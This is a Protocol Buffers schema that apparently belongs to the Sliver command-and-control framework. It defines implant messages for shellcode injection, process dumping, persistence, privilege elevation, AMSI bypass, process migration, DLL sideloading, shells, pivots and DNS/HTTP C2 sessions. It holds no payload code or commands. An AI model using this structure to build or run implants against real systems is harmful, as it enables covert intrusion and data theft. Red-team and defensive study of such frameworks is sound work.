syntax = "proto3";

package sliverpb;

message Envelope {
  uint32 Type = 1; // Message type
  uint64 ID = 2;   // Resp ID
  int64 Timeout = 3;

  bytes Data = 9; // Actual message data

  string Err = 4;
}

message Register {
  string Name = 1;
  string Hostname = 2;
  string Username = 3;
  string Uid = 4;
  string Gid = 5;
  string Os = 6;
  string Arch = 7;
  int32 Pid = 8;
  string Filename = 9;
  string ActiveC2 = 10;
  string Version = 11;
}

message Ping { int32 Nonce = 1; }

message KillReq {
  bool Force = 1;
  uint32 SliverID = 9;
}

// aka Shellcode
message Task {
  string Encoder = 2;
  bool RWXPages = 4;
  uint32 Pid = 3;
  bytes Data = 9;
}

message RemoteTask {
  string Encoder = 2;
  int32 Pid = 3;
  bool RWXPages = 4;
  bytes Data = 9;
}

message PsReq { uint32 SliverID = 9; }

message Ps { repeated Process Processes = 1; }

message Process {
  int32 Pid = 1;
  int32 Ppid = 2;
  string Executable = 3;
  string Owner = 4;
}

message TerminateReq {
  int32 Pid = 1;
  uint32 SliverID = 2;
}

message Terminate {
  string Err = 1;
}

message NetInterface {
  int32 Index = 1;
  string Name = 2;
  string MAC = 3;
  repeated string IPAddresses = 4;
}

message IfconfigReq { uint32 SliverID = 9; }

message Ifconfig { repeated NetInterface NetInterfaces = 1; }

message LsReq {
  string Path = 1;

  uint32 SliverID = 9;
}

message Ls {
  string Path = 1;
  bool Exists = 2;
  repeated FileInfo Files = 3;
}

message FileInfo {
  string Name = 1;
  bool IsDir = 2;
  int64 Size = 3;
}

message PwdReq { uint32 SliverID = 9; }

message CdReq {
  string Path = 1;
  uint32 SliverID = 9;
}

message Pwd {
  string Path = 1;
  string Err = 2;
}

message RmReq {
  string Path = 1;

  uint32 SliverID = 9;
}

message Rm {
  bool Success = 1;
  string Path = 2;
  string Err = 3;
}

message MkdirReq {
  string Path = 1;

  uint32 SliverID = 9;
}

message Mkdir {
  bool Success = 1;
  string Path = 2;
  string Err = 3;
}

message DownloadReq {
  string Path = 1;

  uint32 SliverID = 9;
}

message Download {
  string Path = 1;
  string Encoder = 2;
  bool Exists = 3;

  bytes Data = 9;
}

message UploadReq {
  string Path = 1;
  string Encoder = 2;
  bytes Data = 3;

  uint32 SliverID = 9;
}

message Upload {
  string Path = 1;
  string Err = 2;
  bool Success = 3;
}

message ProcessDumpReq {
  int32 Pid = 1;

  int32 Timeout = 8;
  uint32 SliverID = 9;
}

message ProcessDump {
  bytes Data = 1;
  string Err = 2;
}

message PersistReq {
  bytes Assembly = 1;
  uint32 Minutes = 2;

  uint32 SliverID = 9;
}

message Persist {
  bool Success = 1;
  string Err = 2;
}

message RunAsReq {
  string Username = 1;
  string Process = 2;
  string Args = 3;
  uint32 SliverID = 9;
}

message RunAs {
 string Output = 1;
 string Err = 2;
}

message ImpersonateReq {
  string Username = 1;
  uint32 SliverID = 9;
}

message Impersonate {
  string Err = 1;
}

message RevToSelfReq {
  uint32 SliverID = 9;
}

message RevToSelf {
  string Err = 1;
}

message GetSystemReq {
  bytes Data = 1;
  string HostingProcess = 2;
  uint32 SliverID = 9;
}

message GetSystem { string Output = 1; }

message ElevateReq {
  int32 Timeout = 8;
  uint32 SliverID = 9;
}

message Elevate {
  bool Success = 1;
  string Err = 2;
}

message ExecuteAssemblyReq {
  bytes HostingDll = 1;
  bytes Assembly = 2;
  string Arguments = 3;
  string Process = 4;
  bool AmsiBypass = 8;
  uint32 SliverID = 9;
}

message ExecuteAssembly {
  string output = 1;
  string error = 2;
}

message MigrateReq {
  uint32 Pid = 1;
  bytes Data = 2;
  uint32 SliverID = 9;
}

message Migrate {
  bool Success = 1;
  string Err = 2;
}

message ExecuteReq {
  string Path = 1;
  repeated string Args = 2;
  bool output = 3;
  uint32 SliverID = 9;
}

message Execute {
  string Error = 1;
  string Result = 2;
}

message SideloadReq {
  bytes Data = 1;
  string ProcName = 2;
  string Args = 3;
  uint32 SliverID = 9;
}

message Sideload {
  string Error = 1;
  string Result = 2;
}

message SpawnDllReq {
  bytes Data = 1;
  string ProcName = 2;
  uint32 Offset = 3;
  string Args = 4;
  uint32 SliverID = 9;
}

message SpawnDll {
  string Error = 1;
  string Result = 2;
}
message NetstatRequest {
  bool TCP = 1;
  bool UDP = 2;
  bool IP4 = 3;
  bool IP6 = 5;
  bool Listening = 6;
  uint32 SliverID = 9;
}

message SockTabEntry {
  message SockAddr {
    string Ip = 1;
    uint32 Port = 2;
  }
  SockAddr LocalAddr = 1;
  SockAddr RemoteAddr = 2;
  string SkState = 3;
  uint32 UID = 4;
  Process Proc = 5;
  string Proto = 6;
}

message NetstatResponse { repeated SockTabEntry Entries = 1; }

// DNS Specific messages
message DNSSessionInit { bytes Key = 1; }

message DNSPoll { repeated DNSBlockHeader blocks = 1; }

message DNSBlockHeader {
  string ID = 1;
  uint32 Size = 2;
}

// HTTP Sepecific message
message HTTPSessionInit { bytes Key = 1; }

// Tunnels, shells, and port fwds
message TunnelData {
  uint32 SliverID = 1;

  bytes Data = 2;
  bool Close = 3;
  string Err = 4;

  uint64 TunnelID = 9;
}

message TunnelClose {
  string Err = 1;
  uint64 TunnelID = 9;
}

// Shell messages
message ShellReq {
  uint32 SliverID = 1;
  string Path = 2;
  bool EnablePTY = 3;

  uint64 TunnelID = 9;
}

message Shell {
  bool Success = 1;
  string Err = 2;
  uint32 Pid = 3;

  uint64 TunnelID = 9;
}

// Screenshot Messages
message ScreenshotReq {
  bytes Data = 1;
  uint32 SliverID = 9;
}

message Screenshot {
  bytes Data = 1;
  uint32 SliverID = 9;
}

// Named Pipes Messages
message NamedPipesReq {
  string PipeName = 16;
  uint32 SliverID = 9;
}

message NamedPipes {
  bool Success = 1;
  string Err = 2;
}

// Pivot transport

message PivotOpen {
  uint32 PivotID = 12;
  string PivotType = 13;
  string RemoteAddress = 14;
}

message PivotClose {
  uint32 PivotID = 12;
  string Err = 2;
}

message PivotData {
  uint32 PivotID = 12;
  bytes Data = 2;
}
